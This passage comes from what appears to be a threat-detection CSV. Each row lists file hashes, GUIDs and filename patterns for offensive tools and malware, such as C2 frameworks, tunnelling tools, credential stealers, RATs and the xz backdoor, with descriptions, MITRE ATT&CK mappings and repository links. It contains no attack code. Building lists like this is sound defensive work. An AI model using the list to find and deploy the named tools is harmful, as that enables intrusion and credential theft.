T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*2ee46ca99e6fe3e38dc9e62bed1519080a75b35d947db0f27435a062375f51f4*",".{0,1000}2ee46ca99e6fe3e38dc9e62bed1519080a75b35d947db0f27435a062375f51f4.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2ef7b1aa5f0700ffeabf8464a961bc844a884fe75103a322b8c9d4d135eea212*",".{0,1000}2ef7b1aa5f0700ffeabf8464a961bc844a884fe75103a322b8c9d4d135eea212.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2f2673bba488dc6bfd8e64f2d9b14049a4b495b7149a2e16980547467afc3fba*",".{0,1000}2f2673bba488dc6bfd8e64f2d9b14049a4b495b7149a2e16980547467afc3fba.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*2f40452382f378c481ce9622ea6f10cfb0275cad138c6a45fe16144111fdfa77*",".{0,1000}2f40452382f378c481ce9622ea6f10cfb0275cad138c6a45fe16144111fdfa77.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7*",".{0,1000}2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*2fa02db89575d18c68adbe39e2db1565d9d688adce00b3ba85d6407d3b0cc911*",".{0,1000}2fa02db89575d18c68adbe39e2db1565d9d688adce00b3ba85d6407d3b0cc911.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*2fa97965c5491fd73b586656a2a3d376013fa20918cc501f598439b85e49e244*",".{0,1000}2fa97965c5491fd73b586656a2a3d376013fa20918cc501f598439b85e49e244.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*2FB94059-2D49-4EEA-AAF8-7E89E249644B*",".{0,1000}2FB94059\-2D49\-4EEA\-AAF8\-7E89E249644B.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*2fd99d56b4565653d6d39f1bd747dd14d24aa4d5882dc237da165974791b513c*",".{0,1000}2fd99d56b4565653d6d39f1bd747dd14d24aa4d5882dc237da165974791b513c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*2feda61b4bfe2c6f693f3201ddaec6f08a2df01c63234e933d9041a2e37a7045*",".{0,1000}2feda61b4bfe2c6f693f3201ddaec6f08a2df01c63234e933d9041a2e37a7045.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*2john.c",".{0,1000}2john\.c","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*2john.lua*",".{0,1000}2john\.lua.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*2john.pl*",".{0,1000}2john\.pl.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*2john.py*",".{0,1000}2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*3000b91468e3961b4e1a9ecd07007bfe02f50033d0d4a71dfb4e5b1de778bd13*",".{0,1000}3000b91468e3961b4e1a9ecd07007bfe02f50033d0d4a71dfb4e5b1de778bd13.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*300875180931c7f9f62908e72395f992510eea9e*",".{0,1000}300875180931c7f9f62908e72395f992510eea9e.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*303d4a01829c4696281be3b506ed99c978f5cd2a093af588b6a6aa7d5eee2096*",".{0,1000}303d4a01829c4696281be3b506ed99c978f5cd2a093af588b6a6aa7d5eee2096.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*307298c8eaa57cbc7357324ea06076f648904d20bb3cfdb2fc26c21f6913ec62*",".{0,1000}307298c8eaa57cbc7357324ea06076f648904d20bb3cfdb2fc26c21f6913ec62.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*309c23d800972611948a5980921fdf6e78bdda2fc4d30f4dba3bd8c970a17e94*",".{0,1000}309c23d800972611948a5980921fdf6e78bdda2fc4d30f4dba3bd8c970a17e94.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","0","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*30af65f777eba02b3484f6db7f91b66d465d4497cabf9dd35f7291d5a717a454*",".{0,1000}30af65f777eba02b3484f6db7f91b66d465d4497cabf9dd35f7291d5a717a454.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*30B8883F-A0A2-4256-ADCF-A790525D3696*",".{0,1000}30B8883F\-A0A2\-4256\-ADCF\-A790525D3696.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*30d2134d69653bfb682dd27c1d6e6e7121080c7e60409237fd15e38314a11bca*",".{0,1000}30d2134d69653bfb682dd27c1d6e6e7121080c7e60409237fd15e38314a11bca.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*30e5dea7e4567756d55f7bd13dfbbf4b12d9e585d8d47cd18c700fc632ffdff0*",".{0,1000}30e5dea7e4567756d55f7bd13dfbbf4b12d9e585d8d47cd18c700fc632ffdff0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*",".{0,1000}30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*310d3ef0d6aedac04e40ec62115f8d44d06a57a058030cc1a99e2d6665187eb7*",".{0,1000}310d3ef0d6aedac04e40ec62115f8d44d06a57a058030cc1a99e2d6665187eb7.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*310FC5BE-6F5E-479C-A246-6093A39296C0*",".{0,1000}310FC5BE\-6F5E\-479C\-A246\-6093A39296C0.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*3112a8da28bf74a57ed30ef6ee827f6f832e3053db1ec04fc0f465b6e0c2f2d0*",".{0,1000}3112a8da28bf74a57ed30ef6ee827f6f832e3053db1ec04fc0f465b6e0c2f2d0.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*3150f104ac2f5f1eead627411f14fdc43e50e18aaba185cdfba03cd99475dfac*",".{0,1000}3150f104ac2f5f1eead627411f14fdc43e50e18aaba185cdfba03cd99475dfac.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3170917f0dbe26d4a09283394af0b9a9e9724589cd650d0b451b2c834aab3bf6*",".{0,1000}3170917f0dbe26d4a09283394af0b9a9e9724589cd650d0b451b2c834aab3bf6.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*3178ccb34c7dfd53d77a18d891bdc3d6376f5346746d65e6d386cc9c36040c39*",".{0,1000}3178ccb34c7dfd53d77a18d891bdc3d6376f5346746d65e6d386cc9c36040c39.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*31795b2f772b6ad00274cc4eb40aaf81b5d38d6eeae56bace80a07bbb1aeac35*",".{0,1000}31795b2f772b6ad00274cc4eb40aaf81b5d38d6eeae56bace80a07bbb1aeac35.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*3180a45a681653c3413afb788680f02754995a734bef851661056683691920e8*",".{0,1000}3180a45a681653c3413afb788680f02754995a734bef851661056683691920e8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae*",".{0,1000}319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*31fd2609d81f188c2a778d818c851f56d845d346036cd76283ae7c12d17f05cf*",".{0,1000}31fd2609d81f188c2a778d818c851f56d845d346036cd76283ae7c12d17f05cf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*3204ad88f0f16fc276bde17e0cdb9c0144789b711e86da88599d193db09ce380*",".{0,1000}3204ad88f0f16fc276bde17e0cdb9c0144789b711e86da88599d193db09ce380.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*320fff4e8283c563cb74e5dc61fd68e4cb2743da27aae20d2b260c6c27e41f00*",".{0,1000}320fff4e8283c563cb74e5dc61fd68e4cb2743da27aae20d2b260c6c27e41f00.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*32223BE8-3E78-489C-92ED-7900B26DFF43*",".{0,1000}32223BE8\-3E78\-489C\-92ED\-7900B26DFF43.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*3243a9062544c25918f589d8dbc60e49295bb60cf906e10b532ae83f7ad8cc12*",".{0,1000}3243a9062544c25918f589d8dbc60e49295bb60cf906e10b532ae83f7ad8cc12.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*32A26CB8E0ECA88CA6116E467FC8BD5430E54133A5642ED1AFED8DCC2B9C9DFD*",".{0,1000}32A26CB8E0ECA88CA6116E467FC8BD5430E54133A5642ED1AFED8DCC2B9C9DFD.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*32abb6de73930ce62b7110f0834327b96444fb25939b2ffc4af153faac836d84*",".{0,1000}32abb6de73930ce62b7110f0834327b96444fb25939b2ffc4af153faac836d84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*32ae965a0b8ea94499ffb0368ae4d5a349f84c5b37ba3cba1874d0bd73dc650c*",".{0,1000}32ae965a0b8ea94499ffb0368ae4d5a349f84c5b37ba3cba1874d0bd73dc650c.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*32ccdc0e660f56052d82e4e5788c7d555d7dfcf00d3949dfd98d69a9803619c0*",".{0,1000}32ccdc0e660f56052d82e4e5788c7d555d7dfcf00d3949dfd98d69a9803619c0.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*32CE1CB1-B7D9-416F-8EFE-6A0055867537*",".{0,1000}32CE1CB1\-B7D9\-416F\-8EFE\-6A0055867537.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*32d7996430dea9678208a61548f252f111eea644b325f9a7c2d1bce89e1cbf90*",".{0,1000}32d7996430dea9678208a61548f252f111eea644b325f9a7c2d1bce89e1cbf90.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*32e696d3b380f40adea08a359da80575df34f9130b392f10666fdff9e443769e*",".{0,1000}32e696d3b380f40adea08a359da80575df34f9130b392f10666fdff9e443769e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*32e852ed61681e0f498dfd901863b26277f5f0313e4469b4243991be4f3bea07*",".{0,1000}32e852ed61681e0f498dfd901863b26277f5f0313e4469b4243991be4f3bea07.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 